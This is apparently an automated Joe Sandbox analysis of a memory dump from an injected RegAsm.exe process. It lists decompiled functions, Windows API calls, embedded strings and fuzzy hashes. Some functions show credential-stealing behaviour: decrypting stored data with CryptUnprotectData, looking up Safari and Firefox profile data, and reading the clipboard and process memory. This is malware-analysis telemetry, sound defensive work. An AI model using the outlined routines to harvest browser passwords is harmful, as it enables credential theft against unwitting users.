                            • API String ID: 71445658-0
                            • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                            • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                            • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                            • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                            APIs
                            • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                            • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                            • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                            • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                            • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                            • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                            • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                            APIs
                            • memset.MSVCRT ref: 004095FC
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                              • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                              • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                              • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                              • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                            • String ID:
                            • API String ID: 3655998216-0
                            • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                            • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                            • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                            • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                            APIs
                            • memset.MSVCRT ref: 00445426
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                              • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                              • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                            • String ID:
                            • API String ID: 1828521557-0
                            • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                            • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                            • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                            • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                            APIs
                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                              • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                            • memcpy.MSVCRT ref: 00406942
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??2@FilePointermemcpy
                            • String ID:
                            • API String ID: 609303285-0
                            • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                            • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                            • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                            • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: _wcsicmp
                            • String ID:
                            • API String ID: 2081463915-0
                            • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                            • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                            • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                            • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                            APIs
                              • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                              • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                            • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                              • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: File$CloseCreateErrorHandleLastRead
                            • String ID:
                            • API String ID: 2136311172-0
                            • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                            • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                            • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                            • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                            APIs
                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                            • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??2@??3@
                            • String ID:
                            • API String ID: 1936579350-0
                            • Opcode ID: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                            • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                            • Opcode Fuzzy Hash: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                            • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                            APIs
                            • EmptyClipboard.USER32 ref: 004098EC
                              • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                            • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                            • GlobalFix.KERNEL32(00000000), ref: 00409927
                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                            • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                            • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                            • GetLastError.KERNEL32 ref: 0040995D
                            • CloseHandle.KERNEL32(?), ref: 00409969
                            • GetLastError.KERNEL32 ref: 00409974
                            • CloseClipboard.USER32 ref: 0040997D
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                            • String ID:
                            • API String ID: 2565263379-0
                            • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                            • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                            • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                            • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                            APIs
                            • EmptyClipboard.USER32 ref: 00409882
                            • wcslen.MSVCRT ref: 0040988F
                            • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                            • GlobalFix.KERNEL32(00000000), ref: 004098AC
                            • memcpy.MSVCRT ref: 004098B5
                            • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                            • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                            • CloseClipboard.USER32 ref: 004098D7
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                            • String ID:
                            • API String ID: 2014503067-0
                            • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                            • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                            • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                            • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                            APIs
                            • GetLastError.KERNEL32 ref: 004182D7
                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                            • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                            • LocalFree.KERNEL32(?), ref: 00418342
                            • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                              • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                              • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                            • String ID: OsError 0x%x (%u)
                            • API String ID: 403622227-2664311388
                            • Opcode ID: 63f4947bb6e883e354d3d2ebf96ad5df6c46b6e8727c7c07250c00721f9c325d
                            • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                            • Opcode Fuzzy Hash: 63f4947bb6e883e354d3d2ebf96ad5df6c46b6e8727c7c07250c00721f9c325d
                            • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                            APIs
                            • GetVersionExW.KERNEL32(?), ref: 004173BE
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Version
                            • String ID:
                            • API String ID: 1889659487-0
                            • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                            • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                            • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                            • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                            APIs
                            • _wcsicmp.MSVCRT ref: 004022A6
                            • _wcsicmp.MSVCRT ref: 004022D7
                            • _wcsicmp.MSVCRT ref: 00402305
                            • _wcsicmp.MSVCRT ref: 00402333
                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                              • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                            • memset.MSVCRT ref: 0040265F
                            • memcpy.MSVCRT ref: 0040269B
                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                              • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                            • memcpy.MSVCRT ref: 004026FF
                            • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
                            • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                            • API String ID: 2257402768-1134094380
                            • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                            • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                            • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                            • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                            • String ID: :stringdata$ftp://$http://$https://
                            • API String ID: 2787044678-1921111777
                            • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                            • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                            • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                            • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                            APIs
                            • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                            • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                            • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                            • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                            • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                            • GetWindowRect.USER32(00000000,?), ref: 0041407D
                            • GetWindowRect.USER32(?,?), ref: 00414088
                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                            • GetDC.USER32 ref: 004140E3
                            • wcslen.MSVCRT ref: 00414123
                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                            • ReleaseDC.USER32(?,?), ref: 00414181
                            • _snwprintf.MSVCRT ref: 00414244
                            • SetWindowTextW.USER32(?,?), ref: 00414258
                            • SetWindowTextW.USER32(?,00000000), ref: 00414276
                            • GetDlgItem.USER32(?,00000001), ref: 004142AC
                            • GetWindowRect.USER32(00000000,?), ref: 004142BC
                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                            • GetClientRect.USER32(?,?), ref: 004142E1
                            • GetWindowRect.USER32(?,?), ref: 004142EB
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                            • GetClientRect.USER32(?,?), ref: 0041433B
                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                            • String ID: %s:$EDIT$STATIC
                            • API String ID: 2080319088-3046471546
                            • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                            • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                            • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                            • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                            APIs
                            • EndDialog.USER32(?,?), ref: 00413221
                            • GetDlgItem.USER32(?,000003EA), ref: 00413239
                            • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                            • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                            • memset.MSVCRT ref: 00413292
                            • memset.MSVCRT ref: 004132B4
                            • memset.MSVCRT ref: 004132CD
                            • memset.MSVCRT ref: 004132E1
                            • memset.MSVCRT ref: 004132FB
                            • memset.MSVCRT ref: 00413310
                            • GetCurrentProcess.KERNEL32 ref: 00413318
                            • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                            • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                            • memset.MSVCRT ref: 004133C0
                            • GetCurrentProcessId.KERNEL32 ref: 004133CE
                            • memcpy.MSVCRT ref: 004133FC
                            • wcscpy.MSVCRT ref: 0041341F
                            • _snwprintf.MSVCRT ref: 0041348E
                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                            • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                            • SetFocus.USER32(00000000), ref: 004134B7
                            Strings
                            • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                            • {Unknown}, xrefs: 004132A6
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                            • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                            • API String ID: 4111938811-1819279800
                            • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                            • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                            • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                            • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                            APIs
                            • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                            • GetDlgItem.USER32(?,000003EE), ref: 00401238
                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                            • GetDlgItem.USER32(?,000003EC), ref: 00401273
                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                            • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                            • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                            • SetCursor.USER32(00000000), ref: 0040129E
                            • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                            • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                            • SetBkMode.GDI32(?,00000001), ref: 004012F2
                            • SetTextColor.GDI32(?,00C00000), ref: 00401300
                            • GetSysColorBrush.USER32(0000000F), ref: 00401308
                            • GetDlgItem.USER32(?,000003EE), ref: 00401329
                            • EndDialog.USER32(?,?), ref: 0040135E
                            • DeleteObject.GDI32(?), ref: 0040136A
                            • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                            • ShowWindow.USER32(00000000), ref: 00401398
                            • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                            • ShowWindow.USER32(00000000), ref: 004013A7
                            • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                            • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                            • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                            • String ID:
                            • API String ID: 829165378-0
                            • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                            • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                            • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                            • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                            APIs
                            • memset.MSVCRT ref: 00404172
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                              • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                            • wcscpy.MSVCRT ref: 004041D6
                            • wcscpy.MSVCRT ref: 004041E7
                            • memset.MSVCRT ref: 00404200
                            • memset.MSVCRT ref: 00404215
                            • _snwprintf.MSVCRT ref: 0040422F
                            • wcscpy.MSVCRT ref: 00404242
                            • memset.MSVCRT ref: 0040426E
                            • memset.MSVCRT ref: 004042CD
                            • memset.MSVCRT ref: 004042E2
                            • _snwprintf.MSVCRT ref: 004042FE
                            • wcscpy.MSVCRT ref: 00404311
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                            • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                            • API String ID: 2454223109-1580313836
                            • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                            • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                            • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                            • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                            APIs
                              • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                            • SetMenu.USER32(?,00000000), ref: 00411453
                            • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                            • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                            • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                            • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                            • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                            • memcpy.MSVCRT ref: 004115C8
                            • ShowWindow.USER32(?,?), ref: 004115FE
                            • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                            • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                            • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                            • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                            • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                              • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                              • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                            • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                            • API String ID: 4054529287-3175352466
                            • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
